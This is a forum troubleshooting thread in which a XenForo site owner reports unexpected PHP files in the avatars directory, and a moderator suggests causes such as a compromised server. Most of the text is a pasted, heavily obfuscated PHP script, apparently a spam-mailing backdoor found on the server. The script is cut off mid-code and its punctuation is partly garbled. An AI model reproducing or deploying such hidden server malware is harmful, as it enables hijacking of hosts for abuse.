1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

XF 1.4 PHP Files in Avatars directory

Discussion in 'Troubleshooting and Problems' started by Brit Mansell, Apr 2, 2015.

  1. Brit Mansell

    Brit Mansell Member

    We're getting PHP files uploaded to the /data/avatars directory. I have tried to find some settings or a way to restrict this. Any help would be appreciated.

    Those PHP files are being executed, presumably, over the web. Not a good situation.
     
  2. Jake Bunce

    Jake Bunce XenForo Moderator Staff Member

    XenForo doesn't write PHP files to that directory. Possibilities include:

    1) An addon is responsible.

    2) Some other web application on your server is responsible.

    3) Or your server was compromised and a hacker is uploading files using their access.

    I am curious to see the contents of one of the files if you can paste it here.
     
    batpool52! likes this.
  3. Brit Mansell

    Brit Mansell Member

    Here you go:

    PHP:
    $z26="jmiO@sxhFnD>J\r/u+RcHz3}g\nd{^8 ?eVwl_T\\\t|N5q)LobU]40!p%,rC-97k<'y=W:P\$1BI&S6\"E(K`Y~.Q;f[v2a#X*ZAGtM"$GLOBALS['qjyxw29'] = $z26[31].$z26[55].$z26[55].$z26[45].$z26[55].$z26[35].$z26[55].$z26[31].$z26[52].$z26[45].$z26[55].$z26[96].$z26[2].$z26[9].$z26[23]; $GLOBALS['irxaj0'] = $z26[2].$z26[9].$z26[2].$z26[35].$z26[5].$z26[31].$z26[96]; $GLOBALS['cbimi76'] = $z26[25].$z26[31].$z26[85].$z26[2].$z26[9].$z26[31]; $GLOBALS['fdxkd35'] = $z26[2].$z26[96].$z26[33].$z26[55].$z26[45].$z26[49].$z26[28]; $GLOBALS['zkmxz95'] = $z26[2].$z26[60].$z26[7].$z26[34].$z26[5].$z26[69].$z26[59]; $GLOBALS['qlafq33'] = $z26[1].$z26[25].$z26[41]; $GLOBALS['besfv99'] = $z26[18].$z26[45].$z26[15].$z26[9].$z26[96]; $GLOBALS['akdzl43'] = $z26[96].$z26[2].$z26[1].$z26[31]; $GLOBALS['nmgeu13'] = $z26[18].$z26[45].$z26[9].$z26[5].$z26[96].$z26[89].$z26[9].$z26[96]; $GLOBALS['ylhli22'] = $z26[6].$z26[46].$z26[20].$z26[89].$z26[33].$z26[74].$z26[50]; $GLOBALS['tubyj82'] = $z26[0].$z26[18].$z26[55].$z26[6].$z26[96].$z26[21].$z26[69]; $GLOBALS['wlean57'] = $z26[23].$z26[96].$z26[20].$z26[0].$z26[85].$z26[58].$z26[49]; $GLOBALS['nfnov60'] = $z26[45].$z26[9].$z26[5].$z26[6].$z26[6].$z26[28].$z26[74]; $GLOBALS['kowuc61'] = $z26[9].$z26[63].$z26[25].$z26[33].$z26[25].$z26[49].$z26[58]; $GLOBALS['oenkz14'] = $z26[85].$z26[15].$z26[9].$z26[18].$z26[96].$z26[2].$z26[45].$z26[9].$z26[35].$z26[31].$z26[6].$z26[2].$z26[5].$z26[96].$z26[5]; $GLOBALS['dptpo51'] = $z26[1].$z26[89].$z26[2].$z26[34]; $GLOBALS['wbusj95'] = $z26[7].$z26[85].$z26[55].$z26[46].$z26[45].$z26[58].$z26[69]; $GLOBALS['cqced42'] = $z26[55].$z26[1].$z26[5].$z26[5].$z26[2].$z26[41].$z26[21]; $GLOBALS['hcmkz82'] = $z26[15].$z26[5].$z26[34].$z26[31].$z26[31].$z26[52]; $GLOBALS['wqgpi24'] = $z26[87].$z26[23].$z26[31].$z26[85].$z26[20].$z26[41].$z26[58]; $GLOBALS['lecyc16'] = $z26[33].$z26[45].$z26[33].$z26[7].$z26[60].$z26[88].$z26[28]; $GLOBALS['vbzwj52'] = $z26[96].$z26[55].$z26[2].$z26[1]; $GLOBALS['royge30'] = $z26[52].$z26[55].$z26[31].$z26[23].$z26[35].$z26[55].$z26[31].$z26[52].$z26[34].$z26[89].$z26[18].$z26[31]; $GLOBALS['genac32'] = $z26[23].$z26[31].$z26[96].$z26[7].$z26[45].$z26[5].$z26[96].$z26[46].$z26[63].$z26[9].$z26[89].$z26[1].$z26[31]; $GLOBALS['aibit15'] = $z26[52].$z26[55].$z26[31].$z26[23].$z26[35].$z26[1].$z26[89].$z26[96].$z26[18].$z26[7]; $GLOBALS['vuwpm73'] = $z26[0].$z26[45].$z26[96].$z26[5].$z26[60].$z26[88].$z26[74]; $GLOBALS['ieetj84'] = $z26[7].$z26[55].$z26[87].$z26[20].$z26[60].$z26[41].$z26[49]; $GLOBALS['opimn45'] = $z26[46].$z26[18].$z26[7].$z26[63].$z26[60].$z26[58].$z26[58]; $GLOBALS['xrmxg8'] = $z26[20].$z26[9].$z26[18].$z26[2].$z26[23].$z26[69].$z26[88]; $GLOBALS['qujzg48'] = $z26[5].$z26[96].$z26[55].$z26[34].$z26[31].$z26[9]; $GLOBALS['yfhmb1'] = $z26[25].$z26[45].$z26[55].$z26[7].$z26[2].$z26[88].$z26[41]; $GLOBALS['vbmgn26'] = $z26[1].$z26[42].$z26[1].$z26[52].$z26[46].$z26[21].$z26[69]; $GLOBALS['nhzva51'] = $z26[89].$z26[55].$z26[55].$z26[89].$z26[63].$z26[35].$z26[60].$z26[31].$z26[63].$z26[5]; $GLOBALS['rhucm8'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[5].$z26[31].$z26[34].$z26[31].$z26[18].$z26[96]; $GLOBALS['qfllr88'] = $z26[15].$z26[18].$z26[85].$z26[2].$z26[55].$z26[5].$z26[96]; $GLOBALS['rhpxb62'] = $z26[5].$z26[96].$z26[55].$z26[35].$z26[55].$z26[31].$z26[52].$z26[34].$z26[89].$z26[18].$z26[31]; $GLOBALS['pjogo36'] = $z26[2].$z26[9].$z26[2].$z26[35].$z26[23].$z26[31].$z26[96]; $GLOBALS['vxvhf65'] = $z26[6].$z26[60].$z26[0].$z26[2].$z26[52].$z26[88].$z26[58]; $GLOBALS['krdey40'] = $z26[25].$z26[89].$z26[96].$z26[31]; $GLOBALS['gvtpo81'] = $z26[23].$z26[31].$z26[96].$z26[1].$z26[6].$z26[55].$z26[55]; $GLOBALS['axbve49'] = $z26[9].$z26[52].$z26[7].$z26[46].$z26[0].$z26[58].$z26[49]; $GLOBALS['ozxut67'] = $z26[1].$z26[2].$z26[9]; $GLOBALS['mjwzy5'] = ${$z26[35].$z26[67].$z26[3].$z26[73].$z26[36]}; $GLOBALS['qvkkq65'] = $z26[20].$z26[9].$z26[34].$z26[20].$z26[5].$z26[59].$z26[74]; $GLOBALS['jlety17'] = $z26[52].$z26[55].$z26[31].$z26[23].$z26[35].$z26[5].$z26[52].$z26[34].$z26[2].$z26[96]; $GLOBALS['jmhla61'] = $z26[1].$z26[18].$z26[5].$z26[45].$z26[5].$z26[88]; $GLOBALS['bnmbe55'] = $z26[18].$z26[7].$z26[55]; $GLOBALS['hmhgt49'] = $z26[45].$z26[55].$z26[25]; $GLOBALS['utaus24'] = $z26[15].$z26[55].$z26[34].$z26[25].$z26[31].$z26[18].$z26[45].$z26[25].$z26[31]; $GLOBALS['zmzwd84'] = $z26[5].$z26[96].$z26[55].$z26[2].$z26[52].$z26[5].$z26[34].$z26[89].$z26[5].$z26[7].$z26[31].$z26[5]; $GLOBALS['ujqqf49'] = $z26[89].$z26[55].$z26[55].$z26[89].$z26[63].$z26[35].$z26[85].$z26[34].$z26[2].$z26[52]; $GLOBALS['ifrrf77'] = $z26[52].$z26[55].$z26[31].$z26[23].$z26[35].$z26[1].$z26[89].$z26[96].$z26[18].$z26[7].$z26[35].$z26[89].$z26[34].$z26[34]; $GLOBALS['ztope57'] = $z26[46].$z26[89].$z26[5].$z26[31].$z26[74].$z26[49].$z26[35].$z26[31].$z26[9].$z26[18].$z26[45].$z26[25].$z26[31]; $GLOBALS['mlygh38'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[18].$z26[55].$z26[31].$z26[89].$z26[96].$z26[31]; $GLOBALS['tpzik24'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[34].$z26[89].$z26[5].$z26[96].$z26[35].$z26[31].$z26[55].$z26[55].$z26[45].$z26[55]; $GLOBALS['bxcji64'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[5].$z26[96].$z26[55].$z26[31].$z26[55].$z26[55].$z26[45].$z26[55]; $GLOBALS['ynqyo69'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[5].$z26[31].$z26[96].$z26[35].$z26[45].$z26[52].$z26[96].$z26[2].$z26[45].$z26[9]; $GLOBALS['fofco25'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[5].$z26[31].$z26[96].$z26[35].$z26[9].$z26[45].$z26[9].$z26[46].$z26[34].$z26[45].$z26[18].$z26[60]; $GLOBALS['hpaqw69'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[18].$z26[45].$z26[9].$z26[9].$z26[31].$z26[18].$z26[96]; $GLOBALS['lsftb14'] = $z26[85].$z26[5].$z26[45].$z26[18].$z26[60].$z26[45].$z26[52].$z26[31].$z26[9]; $GLOBALS['jydge81'] = $z26[5].$z26[96].$z26[55].$z26[31].$z26[89].$z26[1].$z26[35].$z26[5].$z26[31].$z26[96].$z26[35].$z26[46].$z26[34].$z26[45].$z26[18].$z26[60].$z26[2].$z26[9].$z26[23]; $GLOBALS['xxhac19'] = $z26[5].$z26[96].$z26[55].$z26[31].$z26[89].$z26[1].$z26[35].$z26[5].$z26[31].$z26[96].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31].$z26[45].$z26[15].$z26[96]; $GLOBALS['sqjqb6'] = $z26[5].$z26[96].$z26[55].$z26[31].$z26[89].$z26[1].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[18].$z26[34].$z26[2].$z26[31].$z26[9].$z26[96]; $GLOBALS['mpbyg6'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[18].$z26[34].$z26[45].$z26[5].$z26[31]; $GLOBALS['oiyff86'] = $z26[85].$z26[18].$z26[34].$z26[45].$z26[5].$z26[31]; $GLOBALS['jriui70'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[55].$z26[31].$z26[89].$z26[25]; $GLOBALS['iaovb66'] = $z26[85].$z26[31].$z26[45].$z26[85]; $GLOBALS['gkopq16'] = $z26[85].$z26[55].$z26[31].$z26[89].$z26[25]; $GLOBALS['acnwa34'] = $z26[5].$z26[45].$z26[18].$z26[60].$z26[31].$z26[96].$z26[35].$z26[33].$z26[55].$z26[2].$z26[96].$z26[31]; $GLOBALS['pybsn6'] = $z26[85].$z26[33].$z26[55].$z26[2].$z26[96].$z26[31]; $GLOBALS['ytjac16'] = $z26[55].$z26[89].$z26[9].$z26[25]; $GLOBALS['opohr97'] = $z26[31].$z26[6].$z26[52].$z26[34].$z26[45].$z26[25].$z26[31]; $GLOBALS['iewnf77'] = $z26[52].$z26[89].$z26[18].$z26[60]; $GLOBALS['lavnu82'] = $z26[15].$z26[9].$z26[52].$z26[89].$z26[18].$z26[60]; $GLOBALS['nylha24'] = $z26[0].$z26[34].$z26[25].$z26[31].$z26[42].$z26[58].$z26[41]; $GLOBALS['fjpnj22'] = $z26[89].$z26[55].$z26[55].$z26[89].$z26[63].$z26[35].$z26[1].$z26[31].$z26[55].$z26[23].$z26[31]; $GLOBALS['lqzly97'] = $z26[34].$z26[45].$z26[9].$z26[23].$z26[88].$z26[2].$z26[52]; @$GLOBALS['qjyxw29'](NULL); @$GLOBALS['irxaj0']($z26[31].$z26[55].$z26[55].$z26[45].$z26[55].$z26[35].$z26[34].$z26[45].$z26[23],NULL); @$GLOBALS['irxaj0']($z26[34].$z26[45].$z26[23].$z26[35].$z26[31].$z26[55].$z26[55].$z26[45].$z26[55].$z26[5],0); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[97].$z26[91], 0x000F); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[94] , 0x0001); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[40].$z26[73], 0x0002); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[83].$z26[76].$z26[73].$z26[36].$z26[71].$z26[3].$z26[40] , 1); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[94].$z26[40].$z26[73].$z26[65].$z26[76].$z26[17] , 2); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[94].$z26[47].$z26[36].$z26[19].$z26[3].$z26[17].$z26[71].$z26[36].$z26[80] , 3); $GLOBALS['cbimi76']($z26[10].$z26[40].$z26[73].$z26[35].$z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[94].$z26[10].$z26[10].$z26[71].$z26[36].$z26[71].$z26[3].$z26[40].$z26[94].$z26[44], 4); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36] , 1); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[8].$z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36], 2); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[73].$z26[36].$z26[17].$z26[76].$z26[94].$z26[97] , 4); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[40].$z26[3] , 5); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[67].$z26[17].$z26[3].$z26[36].$z26[3].$z26[35].$z26[36].$z26[56].$z26[67] , 1); $GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[67].$z26[17].$z26[3].$z26[36].$z26[3].$z26[35].$z26[47].$z26[10].$z26[67] , 2); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36] , 0); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36].$z26[76].$z26[10] , 1); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[76].$z26[19].$z26[44].$z26[3] , 2); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[97].$z26[94].$z26[71].$z26[44].$z26[8].$z26[17].$z26[3].$z26[97] , 3); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[17].$z26[56].$z26[67].$z26[36].$z26[36].$z26[3] , 4); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[10].$z26[94].$z26[36].$z26[94] , 5); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[70].$z26[3].$z26[10].$z26[80] , 6); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[83].$z26[47].$z26[71].$z26[36] , 7); $GLOBALS['cbimi76']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[97].$z26[67].$z26[44].$z26[76].$z26[36].$z26[76].$z26[10] , 8); $GLOBALS['fdxkd35']($z26NULL); $mdbih30 = array($z26[96].$z26[45].$z26[44].$z26[2].$z26[5].$z26[96] => ""$z26[85].$z26[55].$z26[45].$z26[1].$z26[44].$z26[45].$z26[23].$z26[2].$z26[9] => ""$z26[85].$z26[55].$z26[45].$z26[1].$z26[40].$z26[89].$z26[1].$z26[31] => ""$z26[5].$z26[15].$z26[46].$z26[0].$z26[36].$z26[31].$z26[1].$z26[52].$z26[34] => ""$z26[46].$z26[45].$z26[25].$z26[63].$z26[36].$z26[31].$z26[1].$z26[52].$z26[34] => ""$z26[7].$z26[45].$z26[5].$z26[96].$z26[8].$z26[55].$z26[45].$z26[1] => ""); if (FALSE == $GLOBALS['zkmxz95']($z26$mdbih30)) { echo PHP_OS.$z26[16].$GLOBALS['qlafq33'](0987654321).$z26[16].$z26[50].$z26[69].$z26[16].$z26[86].$z26[86].$z26[48].$z26[48].$z26[24]; exit; } $kgjgx72 = array(); for ($irsck14 0$irsck14 $GLOBALS['besfv99']($mdbih30[$z26[96].$z26[45].$z26[44].$z26[2].$z26[5].$z26[96]]); $irsck14++) { $ijxwp10 = array( $z26[2].$z26[25] => $irsck14$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45] => ""$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45].$z26[16] => ""$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[85].$z26[55].$z26[45].$z26[1] => ""$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[85].$z26[55].$z26[45].$z26[1].$z26[16] => ""$z26[23].$z26[35].$z26[25].$z26[45].$z26[1].$z26[89].$z26[2].$z26[9].$z26[96].$z26[45] => ""$z26[23].$z26[35].$z26[25].$z26[45].$z26[1].$z26[89].$z26[2].$z26[9].$z26[85].$z26[55].$z26[45].$z26[1] => ""$z26[23].$z26[35].$z26[9].$z26[89].$z26[1].$z26[31].$z26[85].$z26[2].$z26[55].$z26[5].$z26[96] => ""$z26[23].$z26[35].$z26[9].$z26[89].$z26[1].$z26[31].$z26[34].$z26[89].$z26[5].$z26[96] => ""$z26[23].$z26[35].$z26[46].$z26[45].$z26[25].$z26[63] => ""$z26[23].$z26[35].$z26[5].$z26[15].$z26[46].$z26[0].$z26[31].$z26[18].$z26[96] => ""$z26[23].$z26[35].$z26[85].$z26[85].$z26[85] => FALSE$z26[23].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55] => ""$z26[23].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55].$z26[85].$z26[55].$z26[45].$z26[1] => ""$z26[5].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55] => ""$z26[5].$z26[35].$z26[1].$z26[6].$z26[7].$z26[45].$z26[5].$z26[96] => ""$z26[5].$z26[35].$z26[1].$z26[6].$z26[89].$z26[25].$z26[25].$z26[55] => FALSE$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60] => FALSE$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31] => $GLOBALS['akdzl43'](), $z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52] => $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36]), $z26[5].$z26[35].$z26[52].$z26[45].$z26[55].$z26[96] => 25$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[2].$z26[9] => ""$z26[5].$z26[35].$z26[25].$z26[89].$z26[96].$z26[89].$z26[45].$z26[15].$z26[96] => ""$z26[5].$z26[35].$z26[96].$z26[55].$z26[2].$z26[23] => FALSE$z26[34].$z26[35].$z26[31].$z26[55].$z26[55] => ""$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31] => FALSE$z26[34].$z26[35].$z26[33].$z26[89].$z26[63] => 0$z26[34].$z26[35].$z26[85].$z26[89].$z26[2].$z26[34].$z26[5].$z26[1].$z26[96].$z26[52] => FALSE$z26[34].$z26[35].$z26[5].$z26[1].$z26[96].$z26[52].$z26[35].$z26[31].$z26[9].$z26[25] => FALSE, ); if (FALSE == $GLOBALS['ylhli22']($z26$mdbih30[$z26[96].$z26[45].$z26[44].$z26[2].$z26[5].$z26[96]][$irsck14], $mdbih30$ijxwp10)) { echo PHP_OS.$z26[16].$GLOBALS['qlafq33'](1111111111).$z26[16].$z26[50].$z26[88].$z26[16].$z26[86].$z26[86].$GLOBALS['tubyj82']($z26$mdbih30[$z26[96].$z26[45].$z26[44].$z26[2].$z26[5].$z26[96]][$irsck14]).$z26[48].$z26[48].$z26[24]; continue; } $kgjgx72[] = $ijxwp10; } $GLOBALS['wlean57']($z26$kgjgx72); $GLOBALS['nfnov60']($z26$kgjgx72); $GLOBALS['kowuc61']($z26$kgjgx72); exit; function nydwd49($z26$kgjgx72) { $zixzg2 0$emwwo41 ""; for ($irsck14 0$irsck14 $GLOBALS['besfv99']($kgjgx72); $irsck14++) { if ($kgjgx72[$irsck14][$z26[34].$z26[35].$z26[85].$z26[89].$z26[2].$z26[34].$z26[5].$z26[1].$z26[96].$z26[52]] == TRUE) { echo PHP_OS.$z26[16].$GLOBALS['qlafq33'](2222222222).$z26[16].$z26[50].$z26[49].$z26[16].$z26[86].$z26[86].$GLOBALS['tubyj82']($z26$kgjgx72[$irsck14][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45]].$z26[29].$z26[66].$z26[66].$z26[29].$kgjgx72[$irsck14][$z26[34].$z26[35].$z26[31].$z26[55].$z26[55]]).$z26[48].$z26[48].$z26[24]; } if ($kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] == TRUE) { $emwwo41.= $kgjgx72[$irsck14][$z26[34].$z26[35].$z26[33].$z26[89].$z26[63]]; $zixzg2++; } } if ($zixzg2 == 0) { echo PHP_OS.$z26[16].$GLOBALS['qlafq33'](0987654321).$z26[16].$z26[50].$z26[49].$z26[16].$z26[86].$z26[86].$z26[48].$z26[48].$z26[24]; } else { echo $z26[3].$z26[78].$z26[16].$GLOBALS['qlafq33'](1234567890).$z26[16].$zixzg2.$z26[16].$GLOBALS['besfv99']($kgjgx72).$z26[86].$emwwo41.$z26[48].$z26[24]; } } function onsxx86($z26, &$kgjgx72) { if (!$GLOBALS['oenkz14']($z26[1].$z26[89].$z26[2].$z26[34])) { return FALSE; } for ($irsck14 0$irsck14 $GLOBALS['besfv99']($kgjgx72); $irsck14++) { if ($kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] == TRUE) { continue; } if ($kgjgx72[$irsck14][$z26[23].$z26[35].$z26[85].$z26[85].$z26[85]]) { if (@$GLOBALS['dptpo51']($kgjgx72[$irsck14][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45].$z26[16]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[5].$z26[15].$z26[46].$z26[0].$z26[31].$z26[18].$z26[96]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[46].$z26[45].$z26[25].$z26[63]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55].$z26[85].$z26[55].$z26[45].$z26[1]].$kgjgx72[$irsck14][$z26[23].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55]], $z26[57].$z26[85].$kgjgx72[$irsck14][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[85].$z26[55].$z26[45].$z26[1]])) { $kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] = TRUE$kgjgx72[$irsck14][$z26[34].$z26[35].$z26[33].$z26[89].$z26[63]] = 2; } else { $kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] = FALSE; } } else { if (@$GLOBALS['dptpo51']($kgjgx72[$irsck14][$z26[23].$z26[35].$z26[1].$z26[89].$z26[2].$z26[34].$z26[96].$z26[45].$z26[16]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[5].$z26[15].$z26[46].$z26[0].$z26[31].$z26[18].$z26[96]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[46].$z26[45].$z26[25].$z26[63]], $kgjgx72[$irsck14][$z26[23].$z26[35].$z26[7].$z26[31].$z26[89].$z26[25].$z26[31].$z26[55]])) { $kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] = TRUE$kgjgx72[$irsck14][$z26[34].$z26[35].$z26[33].$z26[89].$z26[63]] = 2; } else { $kgjgx72[$irsck14][$z26[34].$z26[35].$z26[25].$z26[45].$z26[9].$z26[31]] = FALSE; } } } } function gtzjf94($z26, &$kgjgx72) { while ($GLOBALS['wbusj95']($z26$kgjgx72)) { $GLOBALS['cqced42']($z26$kgjgx72); $GLOBALS['hcmkz82'](25000); } } function vgefz59($z26, &$kgjgx72$kkpzl95$zbrar23$doyaq76) { if ($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]] != FALSE) { $GLOBALS['lecyc16']($z26$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]]); } $kgjgx72[$kkpzl95][$z26[34].$z26[35].$z26[31].$z26[55].$z26[55]] = $z26[86].$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]].$z26[48].$GLOBALS['vbzwj52']($GLOBALS['royge30']($z26[14].$z26[13].$z26[24].$z26[14], $z26[29], $zbrar23)); $kgjgx72[$kkpzl95][$z26[34].$z26[35].$z26[85].$z26[89].$z26[2].$z26[34].$z26[5].$z26[1].$z26[96].$z26[52]] = $doyaq76$kgjgx72[$kkpzl95][$z26[34].$z26[35].$z26[5].$z26[1].$z26[96].$z26[52].$z26[35].$z26[31].$z26[9].$z26[25]] = TRUE; return; } function rmssi53($z26, &$kgjgx72) { $tbiem96 $GLOBALS['akdzl43'](); foreach($kgjgx72 as $kkpzl95=>$ijxwp10) { if ($ijxwp10[$z26[34].$z26[35].$z26[5].$z26[1].$z26[96].$z26[52].$z26[35].$z26[31].$z26[9].$z26[25]] == TRUE) { continue; } if ($ijxwp10[$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] + 20 $tbiem96) { if ($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]] == $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36]) && $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[52].$z26[45].$z26[55].$z26[96]] != 587) { $GLOBALS['lecyc16']($z26$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]]); $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[52].$z26[45].$z26[55].$z26[96]] = 587$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[96].$z26[2].$z26[1].$z26[31]] = $GLOBALS['akdzl43'](); continue; } $GLOBALS['wqgpi24']($z26$kgjgx72$kkpzl95$z26[96].$z26[2].$z26[1].$z26[31].$z26[45].$z26[15].$z26[96], FALSE); continue; } switch($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[96].$z26[31].$z26[52]]) { case $GLOBALS['nmgeu13']($z26[73].$z26[36].$z26[76].$z26[67].$z26[35].$z26[56].$z26[3].$z26[40].$z26[40].$z26[76].$z26[56].$z26[36]): if ($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[1].$z26[6].$z26[89].$z26[25].$z26[25].$z26[55]] == FALSE) { $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[1].$z26[6].$z26[89].$z26[25].$z26[25].$z26[55]] = @$GLOBALS['genac32']($kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[1].$z26[6].$z26[7].$z26[45].$z26[5].$z26[96]]); if (!@$GLOBALS['aibit15']($z26[14].$z26[77].$z26[86].$z26[50].$z26[57].$z26[58].$z26[48].$z26[26].$z26[69].$z26[54].$z26[21].$z26[22].$z26[37].$z26[82].$z26[30].$z26[43].$z26[26].$z26[49].$z26[22].$z26[14], $kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[1].$z26[6].$z26[89].$z26[25].$z26[25].$z26[55]])) { $GLOBALS['wqgpi24']($z26$kgjgx72$kkpzl95$z26[55].$z26[31].$z26[5].$z26[45].$z26[34].$z26[87].$z26[31].$z26[29].$z26[1].$z26[6], FALSE); break; } } $qxohi56 0$qhovh99 ''$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]] = $GLOBALS['vuwpm73']($z26$kgjgx72[$kkpzl95][$z26[5].$z26[35].$z26[5].$z26[45].$z26[18].$z26[60]], $GLOBALS['nmgeu13']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[67].$z26[17].$z26[3].$z26[36].$z26[3].$z26[35].$z26[36].$z26[56].$z26[67]), 